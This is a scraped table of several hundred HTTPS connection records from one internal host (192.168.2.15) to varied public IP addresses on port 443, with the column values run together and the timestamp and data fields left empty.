                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12971192.168.2.1538194102.150.6.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12972192.168.2.1546118180.75.123.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12973192.168.2.1533056187.36.112.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12974192.168.2.1559298161.56.124.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12975192.168.2.1556062130.16.59.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12976192.168.2.153471098.110.79.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12977192.168.2.154999037.70.140.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12978192.168.2.155483880.221.53.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12979192.168.2.1548108149.37.69.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12980192.168.2.155382837.34.57.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12981192.168.2.1559932106.43.216.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12982192.168.2.153741293.56.247.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12983192.168.2.155577876.134.105.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12984192.168.2.155990469.170.170.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12985192.168.2.1560638183.94.157.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12986192.168.2.1555396186.5.245.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12987192.168.2.1547082146.8.206.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12988192.168.2.1548104156.234.140.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12989192.168.2.154270851.92.194.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12990192.168.2.1551548105.96.186.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12991192.168.2.1542970148.210.12.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12992192.168.2.154762897.243.201.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12993192.168.2.1557574136.75.73.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12994192.168.2.155403441.158.67.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12995192.168.2.1538622126.71.54.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12996192.168.2.154583687.127.97.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12997192.168.2.1549148203.86.197.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12998192.168.2.154024461.156.100.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12999192.168.2.1552500197.82.170.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13000192.168.2.153796246.39.196.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13001192.168.2.1551438216.245.244.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13002192.168.2.1559592133.113.147.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13003192.168.2.155415265.62.137.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13004192.168.2.1533546208.209.64.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13005192.168.2.1557834145.57.23.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13006192.168.2.1549374107.137.122.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13007192.168.2.1539328141.229.134.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13008192.168.2.154928612.87.3.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13009192.168.2.1554014169.110.99.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13010192.168.2.1559558192.185.214.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13011192.168.2.155042042.127.27.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13012192.168.2.1535802204.48.44.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13013192.168.2.1557054218.162.158.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13014192.168.2.1536460217.225.237.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13015192.168.2.154787091.204.130.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13016192.168.2.154195012.118.141.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13017192.168.2.1535616175.235.163.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13018192.168.2.153822260.107.27.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13019192.168.2.153957065.77.204.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13020192.168.2.1539702217.83.188.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13021192.168.2.154099648.133.61.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13022192.168.2.155407286.87.66.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13023192.168.2.154114053.24.47.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13024192.168.2.154215245.23.64.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13025192.168.2.154890848.146.63.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13026192.168.2.153297412.27.226.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13027192.168.2.1555888129.32.144.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13028192.168.2.1537484150.189.117.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13029192.168.2.155914084.178.3.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13030192.168.2.1551622169.103.104.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13031192.168.2.154432696.114.1.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13032192.168.2.15436988.39.6.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13033192.168.2.1541268150.61.207.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13034192.168.2.1560620196.36.195.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13035192.168.2.154485024.92.146.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13036192.168.2.155885693.78.87.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13037192.168.2.153564452.116.81.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13038192.168.2.1547218112.130.141.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13039192.168.2.1551924196.59.221.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13040192.168.2.1556150216.164.145.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13041192.168.2.1553156100.32.123.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13042192.168.2.153970854.53.237.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13043192.168.2.155055461.171.214.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13044192.168.2.1545406112.129.21.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13045192.168.2.1543702135.42.20.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13046192.168.2.1548446170.31.115.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13047192.168.2.1535354209.33.39.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13048192.168.2.1553318142.227.66.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13049192.168.2.155446875.98.89.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13050192.168.2.153732236.116.83.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13051192.168.2.1539486198.213.26.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13052192.168.2.154992699.168.197.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13053192.168.2.156034078.182.25.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13054192.168.2.1560218109.163.191.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13055192.168.2.1539132170.75.87.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13056192.168.2.155850614.223.51.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13057192.168.2.154114060.133.248.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13058192.168.2.1556114217.187.172.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13059192.168.2.1552454177.8.110.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13060192.168.2.153702059.201.119.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13061192.168.2.1553176106.164.249.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13062192.168.2.1556696200.136.41.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13063192.168.2.1558136182.133.244.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13064192.168.2.15468248.129.176.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13065192.168.2.1544612149.229.153.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13066192.168.2.153799614.112.199.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13067192.168.2.15511768.222.11.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13068192.168.2.15548042.123.211.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13069192.168.2.1537162140.2.239.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13070192.168.2.1541194162.154.191.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13071192.168.2.156018053.101.107.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13072192.168.2.153996270.190.47.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13073192.168.2.154587868.52.7.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13074192.168.2.1550734199.131.206.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13075192.168.2.1553152181.34.224.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13076192.168.2.155748837.225.56.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13077192.168.2.153293839.19.83.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13078192.168.2.15581121.80.31.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13079192.168.2.1550832123.25.128.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13080192.168.2.1535306216.244.74.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13081192.168.2.1534848111.138.149.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13082192.168.2.1536314172.237.72.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13083192.168.2.155456818.131.31.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13084192.168.2.1548276139.111.241.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13085192.168.2.1552740131.98.221.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13086192.168.2.1535666126.181.159.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13087192.168.2.1547618212.208.98.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13088192.168.2.1560202149.99.139.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13089192.168.2.1535132164.7.116.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13090192.168.2.155306265.33.12.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13091192.168.2.154214244.33.28.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13092192.168.2.156056437.159.215.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13093192.168.2.155374248.240.247.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13094192.168.2.1554326116.24.223.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13095192.168.2.1544534142.84.47.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13096192.168.2.155188068.49.61.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13097192.168.2.1550666134.20.151.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13098192.168.2.155478476.55.40.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13099192.168.2.153767819.195.126.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13100192.168.2.1537832195.144.68.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13101192.168.2.154113067.169.165.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13102192.168.2.1535812151.69.248.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13103192.168.2.156040051.120.113.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13104192.168.2.1544626140.164.55.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13105192.168.2.154907472.117.99.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13106192.168.2.1558900206.77.64.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13107192.168.2.1539838162.66.37.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13108192.168.2.1557754147.151.185.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13109192.168.2.1556602145.83.249.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13110192.168.2.1545610207.77.228.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13111192.168.2.155265290.251.248.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13112192.168.2.1551028222.78.185.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13113192.168.2.15585581.208.131.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13114192.168.2.1556232125.24.58.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13115192.168.2.1541696140.43.42.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13116192.168.2.1555268107.228.75.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13117192.168.2.154660865.60.166.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13118192.168.2.1541328168.171.35.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13119192.168.2.155371669.21.52.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13120192.168.2.1536776117.26.118.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13121192.168.2.1550760104.169.194.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13122192.168.2.155974452.141.68.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13123192.168.2.1540488104.234.134.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13124192.168.2.1551784191.211.249.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13125192.168.2.154904854.118.200.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13126192.168.2.1555596182.177.82.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13127192.168.2.156097436.96.231.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13128192.168.2.1552076203.68.173.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13129192.168.2.1545738133.151.225.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13130192.168.2.1544994121.243.200.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13131192.168.2.1546162100.5.95.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13132192.168.2.155563694.123.175.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13133192.168.2.1553920140.117.153.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13134192.168.2.1551436176.72.147.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13135192.168.2.155293446.156.177.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13136192.168.2.1543980180.5.251.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13137192.168.2.1538636204.48.34.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13138192.168.2.1555230133.35.48.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13139192.168.2.1550538159.219.150.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13140192.168.2.1548388161.146.11.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13141192.168.2.1559076176.241.165.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13142192.168.2.155545670.96.122.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13143192.168.2.154405881.194.5.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13144192.168.2.1550276218.25.238.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13145192.168.2.154179274.100.189.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13146192.168.2.1560968105.98.185.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13147192.168.2.15488209.129.215.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13148192.168.2.153747457.143.85.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13149192.168.2.153869214.202.118.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13150192.168.2.1538990116.189.160.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13151192.168.2.1557158179.117.200.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13152192.168.2.153971475.247.45.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13153192.168.2.1558882198.242.133.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13154192.168.2.1539676128.5.62.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13155192.168.2.153318825.247.143.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13156192.168.2.1550742187.141.82.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13157192.168.2.153785413.140.125.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13158192.168.2.1549396198.21.193.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13159192.168.2.155216237.23.231.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13160192.168.2.154213085.190.24.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13161192.168.2.1557902145.156.172.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13162192.168.2.154236471.155.247.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13163192.168.2.155579227.156.135.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13164192.168.2.1547390175.217.185.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13165192.168.2.155449296.35.6.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13166192.168.2.1540054218.0.171.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13167192.168.2.1547530106.107.132.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13168192.168.2.1542450203.148.120.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13169192.168.2.1534002202.116.190.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13170192.168.2.1533450208.116.120.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13171192.168.2.155133849.49.46.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13172192.168.2.155265675.185.22.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13173192.168.2.1550414207.102.251.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13174192.168.2.154014861.16.63.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13175192.168.2.1544318180.252.34.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13176192.168.2.153325847.24.81.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13177192.168.2.1556262109.6.171.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13178192.168.2.1542320128.151.161.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13179192.168.2.155653285.255.186.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13180192.168.2.154562636.92.138.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13181192.168.2.155875888.96.51.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13182192.168.2.153682268.222.148.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13183192.168.2.15350742.162.102.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13184192.168.2.156030460.251.210.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13185192.168.2.153902847.22.236.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13186192.168.2.1550396160.71.156.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13187192.168.2.1553678148.11.68.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13188192.168.2.154432661.89.80.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13189192.168.2.153646235.172.181.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13190192.168.2.154142289.13.157.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13191192.168.2.1542884131.225.250.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13192192.168.2.155094862.182.40.108443
                                            TimestampBytes transferredDirectionData


